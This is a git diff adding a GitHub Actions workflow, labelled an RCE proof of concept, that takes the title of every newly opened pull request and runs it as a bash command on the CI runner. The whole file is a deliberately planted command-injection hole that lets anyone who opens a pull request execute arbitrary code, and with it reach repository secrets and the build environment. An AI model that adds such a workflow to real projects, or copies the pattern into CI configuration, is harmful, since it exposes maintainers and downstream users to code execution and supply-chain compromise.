diff --git a/.github/workflows/tttt.yml b/.github/workflows/tttt.yml new file mode 100644 index 000000000000000..f315d6bd5b4ee46 --- /dev/null +++ b/.github/workflows/tttt.yml @@ -0,0 +1,16 @@ +name: pr-title-rce-poc + +on: + pull_request: + types: [opened] + +jobs: + rce-test: + runs-on: ubuntu-latest + steps: + - name: Execute PR title + env: + PAYLOAD: ${{ github.event.pull_request.title }} + run: | + echo "Running command: $PAYLOAD" + bash -c "$PAYLOAD"